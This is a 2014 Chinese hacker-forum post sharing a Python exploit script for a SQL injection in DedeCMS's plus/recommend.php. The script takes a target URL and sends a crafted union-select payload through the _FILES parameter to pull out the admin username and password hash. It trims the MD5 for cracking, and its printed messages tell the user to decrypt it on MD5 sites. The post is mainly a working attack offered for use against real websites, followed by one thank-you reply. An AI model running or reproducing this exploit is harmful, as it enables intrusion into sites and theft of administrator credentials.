搜索
查看: 734|回复: 1

dedecms EXP python版本

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2014-3-1 10:48:28 | 显示全部楼层 |阅读模式
  1. #coding:GBK
  2. import  re
  3. import urllib
  4. """
  5. dedecms recommend 注入 exp


  6. f4ck team
  7. v5ae team
  8. guest team
  9. """
  10. def md5chuli(md5):
  11.     clhmd5=""
  12.     md5len=len(md5)
  13.     if md5len==32:
  14.         clhmd=md5[6:25]
  15.         clhmd5=clhmd[3:24]
  16.     return clhmd5

  17. error=[]
  18. target=""
  19. target=raw_input("输入目标 要带有http哦!")
  20. b=r".+\..+\..+"
  21. d=re.findall(b,target)
  22. if d==error:
  23.     print "你有毛病? 你输入的是链接么?"
  24.     exit()
  25. else:
  26.     print "start fuck"

  27. target2=target+"/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878"
  28. print target2
  29. url=urllib.urlopen(target2)
  30. page=url.read()
  31. print page
  32. pipei=r"<h2>|(.+)|.+|</h2>"
  33. print re.findall(pipei,page)
  34. pipeimd5=r"<h2>|.+|(.+)|</h2>"
  35. targetmd5=re.findall(pipeimd5,page)

  36. print md5chuli(rargetmd5)
  37. print "上面即为账号和密码其中之一组 MD5已经处理过 可以直接拿去各大MD5站进行解密"
  38. print "如果上面什么也没输出来 说明该站没此漏洞"
复制代码
过段时间可能会取消签到功能了
854955425 该用户已被删除
发表于 2014-3-1 10:48:34 | 显示全部楼层
找到好贴不容易,我顶你了,谢了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表